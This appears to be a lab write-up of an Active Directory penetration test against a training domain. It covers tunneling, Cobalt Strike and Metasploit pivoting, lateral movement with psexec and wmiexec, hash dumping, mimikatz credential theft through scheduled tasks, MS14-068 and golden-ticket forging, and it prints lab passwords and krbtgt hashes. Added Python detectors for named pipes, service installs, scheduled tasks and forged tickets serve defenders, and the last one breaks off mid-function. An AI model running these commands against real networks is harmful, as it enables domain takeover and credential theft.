Contents

EW tunneling
Scanning hosts with nbtscan
Linking CS and MSF
Adding a route in MSF for internal-network pentesting
Lateral movement with WMIEXEC
Lateral movement with Cobalt Strike
Token theft
Pass-the-hash with MSF
Gaining machine access via scheduled tasks
Golden tickets

EW tunneling
Run on Kali:
./ew_for_linux64 -s rcsocks -l 1080 -e 112
Run on the compromised host:
ew_for_Win.exe -s rssocks -d 192.168.33.3 -e 112
Then configure proxychains:
vim /etc/proxychains.conf
MSF's built-in proxy
Configure proxychains
Internal-network scanning: scan 192.168.52.0/24 with CS's scanning module
Hosts discovered
Scan the internal network with Ladon:
Ladon 192.168.52.0/24 OnlinePC
Ladon 192.168.52.0/24 OsScan
Scan hosts with nbtscan:
C:\Users\Administrator\Downloads>nbt.exe 192.168.52.0/24
nbt.exe 192.168.52.0/24
192.168.52.1 WORKGROUP\DESKTOP-SVDB0O0 SHARING
192.168.52.138 GOD\OWA SHARING DC
192.168.52.141 GOD\ROOT-TVI862UBEH SHARING ?
192.168.52.143 GOD\STU1 SHARING
*timeout (normal end of scan)
Linking CS and MSF: spawning a shell from Cobalt Strike to MSF
First create a listener in MSF:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.33.3
msf exploit(handler) > set lport 6666
msf exploit(handler) > exploit -j
Then, in CS, create a listener.
The session is received successfully.
If you need to connect over 3389, open port 3389:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Or turn off the firewall.
run post/windows/manage/enable_rdp
Adding a route in MSF for internal-network pentesting
View the current subnet.
Add the route:
run autoroute -s 192.168.52.0/24
Lateral movement
psexec
Run klist directly to see the credentials currently present.
-accepteula: on the first run a wall of EULA text appears; adding this flag suppresses it.
PsExec.exe -accepteula \\owa.god.org cmd
PsExec.exe \\owa.god.org -u god\Administrator -p hongrisec@2019: cmd.exe
PsExec.exe \\192.168.52.138 -u god\Administrator -p hongrisec@2019: -s cmd /c "quser"
Lateral movement with WMIEXEC
wmiexec is an upgraded version of psexec and is easier to use.
cscript.exe wmiexec.vbs /cmd 192.168.52.138 god\Administrator hongrisec@2019: "ipconfig"    (single-command mode)
cscript.exe //nologo wmiexec.vbs /shell 192.168.52.138 god\Administrator hongrisec@2019:    (semi-interactive mode)
Lateral movement with Cobalt Strike
Because the 192.168.52.0/24 segment cannot reach 192.168.33.3 (the Kali address) directly, CS needs to spawn an SMB beacon so that the internal hosts connect to the Win7 machine instead.
An SMB Beacon communicates through its parent Beacon over a named pipe. Once the two Beacons are linked, the child Beacon receives its tasks from the parent and sends its output back through it. Because linked Beacons talk over Windows named pipes, the traffic is encapsulated in the SMB protocol, which makes an SMB Beacon relatively stealthy and sometimes surprisingly effective at getting past firewalls.
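Defensive counterpart to the passage above, as an added example that is not part of the original write-up: because a linked SMB Beacon lives on a named pipe, Sysmon's PipeCreated (event 17) and PipeConnected (event 18) records are where it shows up. The Python below checks pipe names against the default patterns that public detection rules attribute to Cobalt Strike (msagent_##, MSSE-###-server, postex_####, status_##). The events, host names and images are constructed, and the assumption is that the operator kept the default Malleable C2 pipe names, which a profile can change.

```python
import re

# Default pipe names that public detection rules attribute to Cobalt Strike's
# SMB beacon and its post-exploitation jobs. A Malleable C2 profile can rename
# them, so a match is a strong signal and a miss proves nothing.
DEFAULT_CS_PIPES = {
    "smb beacon (msagent)": re.compile(r"^\\msagent_[0-9a-f]{2}$", re.I),
    "smb beacon (MSSE)":    re.compile(r"^\\MSSE-\d{3,4}-server$", re.I),
    "post-ex job (postex)": re.compile(r"^\\postex_[0-9a-f]{4}$", re.I),
    "post-ex job (status)": re.compile(r"^\\status_[0-9a-f]{2}$", re.I),
}

# Constructed Sysmon pipe events (EventID 17 = PipeCreated, 18 = PipeConnected).
# Hosts, images and pipe names are hypothetical sample data.
SAMPLE_EVENTS = [
    {"EventID": 17, "Computer": "STU1", "Image": r"C:\Windows\System32\rundll32.exe", "PipeName": r"\msagent_2f"},
    {"EventID": 18, "Computer": "ROOT-TVI862UBEH", "Image": r"C:\Windows\System32\svchost.exe", "PipeName": r"\msagent_2f"},
    {"EventID": 17, "Computer": "STU1", "Image": r"C:\Windows\System32\spoolsv.exe", "PipeName": r"\spoolss"},
    {"EventID": 17, "Computer": "STU1", "Image": r"C:\Windows\explorer.exe", "PipeName": r"\MSSE-1337-server"},
    {"EventID": 17, "Computer": "OWA", "Image": r"C:\Windows\System32\svchost.exe", "PipeName": r"\postex_a1b2"},
]


def classify_pipe(pipe_name):
    """Return the label of the first default pattern the pipe name matches, else None."""
    for label, pattern in DEFAULT_CS_PIPES.items():
        if pattern.match(pipe_name):
            return label
    return None


def scan_pipe_events(events):
    """One alert per PipeCreated/PipeConnected event whose name matches a default pattern."""
    alerts = []
    for ev in events:
        if ev.get("EventID") not in (17, 18):
            continue
        label = classify_pipe(ev["PipeName"])
        if label is None:
            continue
        alerts.append({
            "host": ev["Computer"],
            "image": ev["Image"],
            "pipe": ev["PipeName"],
            "action": "created" if ev["EventID"] == 17 else "connected",
            "match": label,
        })
    return alerts


def hosts_by_pipe(alerts):
    """Map each flagged pipe name to the sorted hosts it appeared on: a quick view of
    which machines the beacon chain touches."""
    out = {}
    for a in alerts:
        out.setdefault(a["pipe"].lower(), set()).add(a["host"])
    return {pipe: sorted(hosts) for pipe, hosts in out.items()}


if __name__ == "__main__":
    found = scan_pipe_events(SAMPLE_EVENTS)
    for a in found:
        print(f"{a['host']}: {a['image']} {a['action']} {a['pipe']} -> {a['match']}")
    print(hosts_by_pipe(found))
```

Since a profile can rename the pipes, pair this with a per-host baseline of which images normally create pipes: a pipe created by rundll32.exe or explorer.exe that no installed product explains deserves a look even when its name is unremarkable.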
First, use CS's spawn-session feature.
You get a spawned session.
Pass-the-hash
Take every machine in the domain.
Or use token theft.
The server is taken successfully.
Pass-the-hash with MSF
Add the route:
run autoroute -s 192.168.52.0/24
Escalate privileges with getsystem.
Get the hashes:
run post/windows/gather/hashdump
meterpreter > getsystem
...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
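An added example (not from the original write-up) that turns the dump above into an audit a defender can run: the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 and the LM hash aad3b435b51404eeaad3b435b51404ee are the well-known hashes of an empty password, so every account in that output is either passwordless or its hash could not be read. The script parses pwdump-format lines and flags blank NT hashes, the RID 500 account, stored LM hashes, and passwords shared between accounts. The two extra accounts in the sample (svc_backup, helpdesk) and their hashes are constructed.

```python
import re
from collections import defaultdict

# Well-known hashes of the empty string: an account showing these has no
# password set (or, for NT, the hash could not be read and was reported blank).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump format, one account per line: user:rid:lm_hash:nt_hash:::
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Sample dump: the three accounts from the hashdump output above, plus two
# constructed accounts (hypothetical names and hashes) that exercise the other checks.
SAMPLE_DUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""


def parse_pwdump(text):
    """Return a dict per well-formed pwdump line; anything else (banners, prompts) is ignored."""
    rows = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            rows.append({
                "user": m["user"],
                "rid": int(m["rid"]),
                "lm": m["lm"].lower(),
                "nt": m["nt"].lower(),
            })
    return rows


def audit_hashes(rows):
    """Return (account, finding) pairs for the weaknesses a defender should act on."""
    findings = []
    users_by_nt = defaultdict(list)
    for r in rows:
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "blank NT hash: empty password (or hash not retrievable)"))
            if r["rid"] == 500:
                findings.append((r["user"], "built-in Administrator (RID 500) has no password"))
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], "LM hash stored: LM hashing is not disabled on this host"))
        users_by_nt[r["nt"]].append(r["user"])
    # Identical NT hashes mean identical passwords: one crack, or one reuse of the
    # hash, opens every account in the group.
    for nt, users in users_by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append((",".join(users), "same NT hash: password shared across accounts"))
    return findings


def audit_text(text):
    return audit_hashes(parse_pwdump(text))


if __name__ == "__main__":
    for account, finding in audit_text(SAMPLE_DUMP):
        print(f"{account}: {finding}")
```

The same parser accepts the output of any tool that emits pwdump lines, so it can be pointed at an offline SAM/NTDS audit as easily as at a meterpreter log.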
Getting a meterpreter session directly with MSF
Use a bind (forward) connection:
msf5 exploit(windows/smb/psexec) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > show options
set payload windows/meterpreter/bind_tcp
Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.52.141   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             god              no        The Windows domain to use for authentication
   SMBPass               hongrisec@2019:  no        The password for the specified username
   SMBUser               Administrator    no        The username to authenticate as

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     9912             yes       The listen port
   RHOST     192.168.52.141   no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf5 exploit(windows/smb/psexec) > set RHOST 192.168.52.141
RHOST => 192.168.52.141
msf5 exploit(windows/smb/psexec) > exploit
[*] 192.168.52.141:445 - Connecting to the server...
[*] 192.168.52.141:445 - Authenticating to 192.168.52.141:445|god as user 'Administrator'...
[*] 192.168.52.141:445 - Selecting native target
[*] 192.168.52.141:445 - Uploading payload... NdNRbMHz.exe
[*] 192.168.52.141:445 - Created \NdNRbMHz.exe...
[+] 192.168.52.141:445 - Service started successfully...
[*] 192.168.52.141:445 - Deleting \NdNRbMHz.exe...
[*] Started bind TCP handler against 192.168.52.141:9912
[*] Sending stage (180291 bytes) to 192.168.52.141
[*] Meterpreter session 2 opened (192.168.33.3-192.168.33.5:0 -> 192.168.52.141:9912) at 2020-05-22 14:12:38 +0800
meterpreter >
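On the target side the exchange above leaves a trace: a service with a random eight-letter name whose binary was written straight into the ADMIN$ root (C:\Windows), started, and deleted. This added example, not from the original page or from Metasploit, runs a few heuristics over System event 7045 (or Security 4697) service-install records: the Sysinternals PSEXESVC name, a random-looking executable directly under %SystemRoot%, a random-looking service name, and a service whose image path is a cmd.exe one-liner (the shape a command-running service takes, as with the psexec_command module further down). The event records are constructed, and the randomness test (letters only with no vowels, or several case flips) is a labelled heuristic.

```python
import re

VOWELS = set("aeiouAEIOU")
# An .exe sitting directly in C:\Windows, i.e. dropped into the ADMIN$ share root.
SYSTEMROOT_EXE = re.compile(r"^c:\\windows\\([^\\]+\.exe)$", re.I)
# cmd.exe /c or %COMSPEC% /c at the start of the image path or after a backslash.
CMD_ONELINER = re.compile(r"(^|\\)(cmd\.exe|%comspec%)\s+/[ck]\b", re.I)

# Constructed 7045 records (hypothetical hosts); the first three mimic what remote
# execution tooling leaves behind, the last two are ordinary product services.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "ROOT-TVI862UBEH", "ServiceName": "NdNRbMHz",
     "ImagePath": r"%SystemRoot%\NdNRbMHz.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "OWA", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "OWA", "ServiceName": "XlMqPdzs",
     "ImagePath": r"%COMSPEC% /C echo ipconfig ^> %SYSTEMDRIVE%\WINDOWS\Temp\out.txt > %SYSTEMDRIVE%\WINDOWS\Temp\run.bat & %COMSPEC% /C %SYSTEMDRIVE%\WINDOWS\Temp\run.bat",
     "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "STU1", "ServiceName": "Sense",
     "ImagePath": r'"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"',
     "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "STU1", "ServiceName": "WinDefend",
     "ImagePath": r'"C:\Program Files\Windows Defender\MsMpEng.exe"', "AccountName": "LocalSystem"},
]


def looks_random(name):
    """Heuristic: a letters-only name (extension ignored) with no vowels at all, or with
    four or more case flips, like the 8-letter names a tool generates."""
    stem = name.rsplit(".", 1)[0]
    if not re.fullmatch(r"[A-Za-z]{6,16}", stem):
        return False
    flips = sum(1 for a, b in zip(stem, stem[1:]) if a.islower() != b.islower())
    vowels = sum(1 for c in stem if c in VOWELS)
    return vowels == 0 or flips >= 4


def normalize_path(image_path):
    """Strip quoting and the \\\\?\\ prefix, expand %SystemRoot%/%windir% to C:\\Windows."""
    p = image_path.strip().strip('"')
    if p.startswith("\\\\?\\"):
        p = p[4:]
    return re.sub(r"^%(systemroot|windir)%", r"C:\\Windows", p, flags=re.I)


def check_service_install(ev):
    """Reasons a service-install event looks like remote-execution tooling (empty if none)."""
    reasons = []
    name = ev.get("ServiceName", "")
    path = normalize_path(ev.get("ImagePath", ""))
    if name.upper() == "PSEXESVC" or "psexesvc" in path.lower():
        reasons.append("Sysinternals PsExec service")
    m = SYSTEMROOT_EXE.match(path)
    if m and looks_random(m.group(1)):
        reasons.append("random-named executable dropped in the ADMIN$ root (C:\\Windows)")
    if looks_random(name):
        reasons.append("random-looking service name")
    if CMD_ONELINER.search(path):
        reasons.append("service binary is a cmd.exe one-liner")
    return reasons


def scan_service_events(events):
    """(host, service name, reasons) for every 7045/4697 record that trips a heuristic."""
    alerts = []
    for ev in events:
        if ev.get("EventID") not in (7045, 4697):
            continue
        reasons = check_service_install(ev)
        if reasons:
            alerts.append((ev["Computer"], ev["ServiceName"], reasons))
    return alerts


if __name__ == "__main__":
    for host, svc, reasons in scan_service_events(SAMPLE_EVENTS):
        print(f"{host}: service {svc}: {'; '.join(reasons)}")
```

Service creation by a network logon is rare on workstations, so correlating each hit with the preceding 4624 logon type 3 from the same source, and with the 7036 start and later file deletion, turns a single heuristic into a sequence that is hard to explain away.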
Executing commands with MSF's psexec
use auxiliary/admin/smb/psexec_command
msf5 auxiliary(admin/smb/psexec_command) > set RHOSTS 192.168.52.138    <- target IP
RHOSTS => 192.168.52.138
msf5 auxiliary(admin/smb/psexec_command) > set SMBDOMAIN god    <- domain name (god/Administrator)
SMBDOMAIN => god
msf5 auxiliary(admin/smb/psexec_command) > set SMBUSER Administrator    <- domain user
SMBUSER => Administrator
msf5 auxiliary(admin/smb/psexec_command) > set SMBPASS hongrisec@2019:    <- password, or a hash
SMBPASS => hongrisec@2019:
msf5 auxiliary(admin/smb/psexec_command) > set COMMAND ipconfig    <- command to run
COMMAND => ipconfig
msf5 auxiliary(admin/smb/psexec_command) > exploit
[+] 192.168.52.138:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.52.138:445 - checking if the file is unlocked
[*] 192.168.52.138:445 - Getting the command output...
[*] 192.168.52.138:445 - Executing cleanup...
[+] 192.168.52.138:445 - Cleanup was successful
[+] 192.168.52.138:445 - Command completed successfully!
[*] 192.168.52.138:445 - Output for "ipconfig":
Windows IP 配置
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::482e:ddf9:ce9f:4854%11
IPv4 地址 . . . . . . . . . . . . : 192.168.52.138
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 192.168.52.2
隧道适配器 isatap.{D7C92CB6-1939-46AC-85CE-50401CEC5056}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
[*] 192.168.52.138:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Getting in via IPC$
Establish the IPC$ connection:
net use \\192.168.52.138\ipc$ "hongrisec@2019:" /user:god\Administrator
C:\Windows\system32>dir \\192.168.52.138\c$
dir \\192.168.52.138\c$
Volume in drive \\192.168.52.138\c$ has no label.
Volume Serial Number is 1E4D-1970
Directory of \\192.168.52.138\c$
19/10/13 13:06 <DIR> ExchangeSetupLogs
19/08/24 21:55 <DIR> inetpub
09/07/14 11:20 <DIR> PerfLogs
19/08/24 21:34 <DIR> Program Files
19/08/24 21:34 <DIR> Program Files (x86)
19/10/13 18:01 <DIR> redis
20/05/14 22:11 <DIR> Users
20/05/22 13:41 <DIR> Windows
0 File(s) 0 bytes
8 Dir(s) 13,964,476,416 bytes free
C:\Windows\system32>
View the processes running on the target machine:
C:\Users\Administrator\Downloads>tasklist /S 192.168.52.138 /U god\Administrator /P hongrisec@2019:
Gaining machine access via scheduled tasks
Check the target machine's time:
C:\Windows\system32>net time \\192.168.52.138
net time \\192.168.52.138
Current time at \\192.168.52.138 is 2020/5/22 17:12:03
The command completed successfully.
C:\Windows\system32>
copy mimikatz.exe \\192.168.52.138\c$
copy mimidrv.sys \\192.168.52.138\c$
copy mimilib.dll \\192.168.52.138\c$
at \\192.168.52.138 17:29:00 C:\mimi.bat
The content of mimi.bat is:
c:\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>1.txt
copy mimikatz_x64.exe \\192.168.52.138\c$
Run it through a scheduled task:
at \\192.168.52.138 17:54:00 cmd.exe /c "C:\mimikatz_x64.exe>1.txt"
Clean up traces
# Delete the at job
at \\192.168.1.1 ID /delete
net use <remote name> /del /y
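Defender's view of this section, added here and not part of the original write-up: the at.exe jobs above show up on the target as Security event 4698 (scheduled task created) with names like \At1, and the cleanup as 4699 (scheduled task deleted). The Python below flags 4698 records that are legacy at jobs, that run a binary dropped in a drive root, or that redirect command output to a file, and it correlates a task's creation with its deletion within a short window. The event records, timestamps and task XML are constructed; the field names follow the 4698/4699 event schema.

```python
import html
import re
from datetime import datetime, timedelta

AT_JOB = re.compile(r"^\\At\d+$", re.I)          # names at.exe assigns to its jobs
ROOT_BINARY = re.compile(r"^[a-z]:\\[^\\]+\.(exe|bat|cmd|vbs|ps1)$", re.I)

T = datetime.fromisoformat
# Constructed Security events on a hypothetical host; times and task XML are sample data.
SAMPLE_EVENTS = [
    {"EventID": 4698, "time": T("2020-05-22T17:28:40"), "Computer": "OWA", "SubjectUserName": "Administrator",
     "TaskName": r"\At1",
     "TaskContent": r"<Task><Actions><Exec><Command>C:\mimi.bat</Command></Exec></Actions></Task>"},
    {"EventID": 4698, "time": T("2020-05-22T17:53:10"), "Computer": "OWA", "SubjectUserName": "Administrator",
     "TaskName": r"\At2",
     "TaskContent": r"<Task><Actions><Exec><Command>cmd.exe</Command><Arguments>/c &quot;C:\mimikatz_x64.exe&gt;1.txt&quot;</Arguments></Exec></Actions></Task>"},
    {"EventID": 4699, "time": T("2020-05-22T17:40:05"), "Computer": "OWA", "SubjectUserName": "Administrator",
     "TaskName": r"\At1", "TaskContent": ""},
    {"EventID": 4698, "time": T("2020-05-22T03:00:00"), "Computer": "OWA", "SubjectUserName": "SYSTEM",
     "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": r"<Task><Actions><Exec><Command>%windir%\system32\defrag.exe</Command><Arguments>-c -h -o -$</Arguments></Exec></Actions></Task>"},
]


def task_command(task_content):
    """Pull <Command> and <Arguments> out of the task XML carried by a 4698 event,
    decoding XML entities so that a redirect written as &gt; is seen as >."""
    cmd = re.search(r"<Command>(.*?)</Command>", task_content, re.S)
    args = re.search(r"<Arguments>(.*?)</Arguments>", task_content, re.S)
    return (html.unescape(cmd.group(1)).strip().strip('"') if cmd else "",
            html.unescape(args.group(1)).strip() if args else "")


def analyze_task_events(events, delete_window=timedelta(minutes=30)):
    """(host, task name, reasons) for suspicious creations and for create-then-delete pairs."""
    alerts = []
    created_at = {}   # (host, task name) -> creation time of the last 4698
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["Computer"], ev["TaskName"].lower())
        if ev["EventID"] == 4698:
            reasons = []
            if AT_JOB.match(ev["TaskName"]):
                reasons.append("legacy at.exe job")
            cmd, args = task_command(ev.get("TaskContent", ""))
            if ROOT_BINARY.match(cmd):
                reasons.append("runs a binary dropped in a drive root")
            if ">" in args:
                reasons.append("redirects command output to a file")
            created_at[key] = ev["time"]
            if reasons:
                alerts.append((ev["Computer"], ev["TaskName"], reasons))
        elif ev["EventID"] == 4699:
            t0 = created_at.pop(key, None)
            if t0 is not None and ev["time"] - t0 <= delete_window:
                minutes = int((ev["time"] - t0).total_seconds() // 60)
                alerts.append((ev["Computer"], ev["TaskName"],
                               [f"task deleted {minutes} min after creation (run-and-clean-up pattern)"]))
    return alerts


if __name__ == "__main__":
    for host, task, reasons in analyze_task_events(SAMPLE_EVENTS):
        print(f"{host}: {task}: {'; '.join(reasons)}")
```

Task creation and deletion are only logged when "Audit Other Object Access Events" is enabled, so check that policy before relying on these events; the share-access events (5140/5145 on C$ and ADMIN$) that accompany the copy steps above make a useful second source.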
ms14-068
Benjamin Delpy (the author of mimikatz) wrote an MS14-068 exploitation tool called Kekeo, an upgraded version of PyKEK. It can find and target the vulnerable domain controller, and still works against patched (KB3011780) and 2012/2012 R2 domain controllers.
Before exploiting MS14-068, it is recommended to first run klist purge to clear the Kerberos credentials cached on the server side, and to use the domain controller's name rather than its IP.
Get the domain user's SID
A SID (security identifier) is the unique ID string assigned to every account created in a domain or on a local computer.
whoami /all
S-1-5-21-2952760202-1353902439-2381784089-500
Enter klist to view tickets.
If there are any, enter klist purge to clear them.
ms14-068.exe -u Administrator@god.org -p "hongrisec@2019:" -s S-1-5-21-2952760202-1353902439-2381784089-500 -d owa.god.org
-u  domain user@domain name
-s  the domain user's SID
-d  domain controller address
-p  the domain member's password
You can see that a ticket is obtained.
Inject into memory
Then use mimikatz to inject the ticket (TGT) into the current process memory, forging the Kerberos authentication credential.
kerberos::purge
kerberos::list
kerberos::ptc TGT_Administrator@god.org.ccache
kerberos::ptt TGT_Administrator@god.org.kirbi
Again, generate a ticket with ms14-068.
After the command runs, a .ccache file is generated in the current directory.
Then use KrbCredExport to convert the .ccache file to kirbi format, i.e. user.ticket: https://github.com/rvazarkar/KrbCredExport
python KrbCredExport.py TGT_tidetest@tide.org.ccache user.ticket
Now with the kekeo version
Enter klist to view tickets; if there are any, enter klist purge to clear them.
kekeo.exe /domain:god.org /user:Administrator /password:hongrisec@2019:/ /ptt
Golden tickets
First, you can get the krbtgt hash directly with mimikatz:
privilege::debug
mimikatz log
mimikatz # lsadump::dcsync /domain:god.org /user:krbtgt
[DC] 'god.org' will be the domain
[DC] 'owa.god.org' will be the DC server
[DC] 'krbtgt' will be the user account
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 2019/8/24 21:44:23
Object Security ID : S-1-5-21-2952760202-1353902439-2381784089-502
Object Relative ID : 502
Credentials:
Hash NTLM: 58e91a5ac358d86513ab224312314061
ntlm- 0: 58e91a5ac358d86513ab224312314061
lm - 0: a151f0fbafab56da67864278a60a75e8
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : GOD.ORGkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2cd9b128308cef74df
aes128_hmac (4096) : 2e35721544960f553afcba54252d7b13
des_cbc_md5 (4096) : 8cc1019b7ccd1319
rc4_plain (4096) : 58e91a5ac358d86513ab224312314061
* Primary:Kerberos *
Default Salt : GOD.ORGkrbtgt
Credentials
des_cbc_md5 : 8cc1019b7ccd1319
rc4_plain : 58e91a5ac358d86513ab224312314061
* Packages *
Kerberos-Newer-Keys
* Primary:WDigest *
01 abb457b021966fc900dc1cebd9c4d188
02 2d15787683382a038d82e156840ecb77
03 18ef670658849985036123a064571815
04 abb457b021966fc900dc1cebd9c4d188
05 2d15787683382a038d82e156840ecb77
06 7ae9071dab444ffbc1501482b8da7fcf
07 abb457b021966fc900dc1cebd9c4d188
08 e9bf3798e5576c80edb166bfdafdd619
09 e9bf3798e5576c80edb166bfdafdd619
10 5f7902c1420805e10f6cd9eec52a8ef2
11 5703bb42566a5fc66608da6d5f970edd
12 e9bf3798e5576c80edb166bfdafdd619
13 7c25bef95327fc5526d56998fd8f0559
14 5703bb42566a5fc66608da6d5f970edd
15 218957cc83eb53a3b8bbe1b224dff044
16 218957cc83eb53a3b8bbe1b224dff044
17 05a7d647bdbb4585bb7c16fdff9a134d
18 fd69eb9c15b4d06b66d64bb6654ec88c
19 016f7e4fb4d3479153aed646b3f68fff
20 579c3a2eccfb4a5ce12a6bef37168cd1
21 d6dca44013c12ed0fbb36f0f21a016ac
22 d6dca44013c12ed0fbb36f0f21a016ac
23 2eab868d52e16908d3ee3b44edf00a39
24 0b518bae8d78e8d2961e429d16f361fc
25 0b518bae8d78e8d2961e429d16f361fc
26 b2c7b7ae7e52799e7f8d71350f983583
27 786df62e1c05700ff1bfae6bad92ac76
28 16464caeecd021b600794f8f36947f86
29 eb729371fa8cc2a1e43c4c6614f60f3b
mimikatz #
There are 2 ways to generate the ticket: with the AES key, or with the NTLM hash.
What matters is the domain SID, krbtgt's NTLM hash, and the aes256_hmac key.
The 2 ways to use a golden ticket
Generate the golden ticket and export it to a file
# Using krbtgt's NTLM hash:
mimikatz# kerberos::golden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx /krbtgt:<ntlm hash> /ticket:test.kirbi
# Using krbtgt's aes256 key:
mimikatz# kerberos::golden /domain:xxx.xxx /sid:xxxxxxxxxxx /aes256:xxxxxxxx /user:Administrator /ticket:test.kirbi
Use it:
mimikatz# kerberos::ptt test.kirbi
PS C:\Users\Administrator> klist
PS C:\Users\Administrator> net use \\xx.domain-name
dir \\xx.domain-name\c$
Generate the golden ticket and load it straight into memory
mimikatz# "kerberos::golden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx /krbtgt:<ntlm hash> /ptt" exit
mimikatz "kerberos::golden /domain:<domain name> /sid:<domain SID> /aes256:<aes256_hmac> /user:<any user name> /ptt" exit
# Access using the ticket
PS C:\Users\Administrator> net use \\xx.domain-name
dir \\xx.domain-name\c$
Access via PsExec
psexec \\192.168.52.138 cmd
Using wmiexec.vbs
cscript.exe wmiexec.vbs /cmd 192.168.52.138 "command"
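A defender's view of the golden-ticket section, added here and not part of the original write-up. A forged TGT is never issued by the DC, so it produces no 4768 (TGT issued) event; the first thing the DC sees is a 4769 (service ticket request) presenting a TGT it never minted. The Python below applies heuristics that public Active Directory security guidance uses for this: an RC4 (0x17) ticket in a domain whose accounts have AES keys (what a ticket built from the NTLM hash yields, as in the first variant above; the /aes256 variant does not trip this check), an account-domain field carrying the FQDN instead of the NetBIOS name, a user name that does not exist in the directory (the /user:<any user name> case), and a service-ticket request with no preceding TGT issuance for that user from that client. The events, the known-user snapshot and the NetBIOS name are constructed.

```python
from datetime import datetime, timedelta

RC4_HMAC = 0x17          # etype of a ticket keyed from the NTLM hash
T = datetime.fromisoformat

# Constructed directory snapshot and DC Security events (hypothetical hosts and times).
KNOWN_USERS = {"administrator", "liukaifeng01", "krbtgt"}
SAMPLE_EVENTS = [
    {"EventID": 4768, "time": T("2020-05-22T10:00:00"), "TargetUserName": "Administrator",
     "TargetDomainName": "GOD", "IpAddress": "192.168.52.143", "TicketEncryptionType": 0x12},
    {"EventID": 4769, "time": T("2020-05-22T10:01:00"), "TargetUserName": "Administrator@GOD.ORG",
     "TargetDomainName": "GOD", "ServiceName": "OWA$", "IpAddress": "192.168.52.143", "TicketEncryptionType": 0x12},
    {"EventID": 4769, "time": T("2020-05-22T10:05:00"), "TargetUserName": "Administrator@god.org",
     "TargetDomainName": "god.org", "ServiceName": "OWA$", "IpAddress": "192.168.52.141", "TicketEncryptionType": 0x17},
    {"EventID": 4769, "time": T("2020-05-22T10:06:00"), "TargetUserName": "ghost@GOD.ORG",
     "TargetDomainName": "GOD", "ServiceName": "OWA$", "IpAddress": "192.168.52.141", "TicketEncryptionType": 0x12},
]


def detect_golden_ticket(events, known_users, netbios_domain, tgt_lookback=timedelta(hours=10)):
    """Return (event, reasons) for each 4769 that shows forged-ticket traits.

    4768 events are only consumed to remember which (user, client) pairs were
    legitimately issued a TGT inside the lookback; computer accounts are skipped
    because they renew constantly and are not what a golden ticket impersonates."""
    alerts = []
    last_tgt = {}   # (user, client ip) -> time of the most recent 4768
    for ev in sorted(events, key=lambda e: e["time"]):
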